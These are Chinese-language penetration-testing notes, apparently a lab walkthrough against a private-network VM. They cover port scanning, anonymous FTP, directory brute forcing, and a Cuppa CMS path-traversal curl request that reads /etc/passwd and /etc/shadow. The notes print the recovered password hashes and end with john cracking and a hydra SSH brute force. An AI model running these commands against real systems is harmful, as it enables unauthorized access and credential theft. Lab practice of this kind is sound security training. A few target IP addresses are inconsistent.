信息收集nmap
sudo nmap -sn 192.168.37.0/24
sudo nmap -sT --min-rate 1000 -p- 192.168.37.7 -oA nmapscan/ports
ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.37.7 -oA nmapscan/detail
sudo nmap -sU --top-ports 20 192.162.37.7 -oA nmapscan/udp
sudo nmap --script=vuln -p21,22,80,3306 192.168.37.7 -oA nmapscan/vuln
ftp > anonymous(username):(passwd)
binary(切换二进制模式,防止下载错误文件)
?(查看文件目录)
ls
prompt(关掉交互式的提示)
mget *.txt(下载所有.txt文件)
hash-identifier(识别哈希加密算法工具)
vim md5
使用john解密md5: john md5
使用网络md5工具破解:This is not a password
echo -n 'This is not a password' | md5sum (验证)
echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d (base64解密)
爆破
gobuster
gobuster dir -u http://192.168.37.7/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
dirb指定文件类型查找
dirb http://192.168.37.3/ -X .zip,.txt -o report/dirbveryhart.txt
wfuzz模糊测试
sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.37.3/index.php?FUZZ=something
wbscan
sudo wpscan -e u --url http://192.168.37.3/wordpress
searchsploit cuppa cms
searchsploit cuppa
可以访问
使用post接受参数
使用curl post提交
curl --help all | grep url(查看url post提交具体解释)
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.37.7/administrator/alerts/alertConfigField.php
成功打印passwd文件
查看shadow文件
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
保存并使用john解密
john shadow
也可以直接破解ssh密码
hydra -L user.list -P /usr/share/wordlists/rockyou.txt ssh://192.168.37.7 -t 4
user.list:
Naomi
Hector
Joseph
Albert
Gina
Rico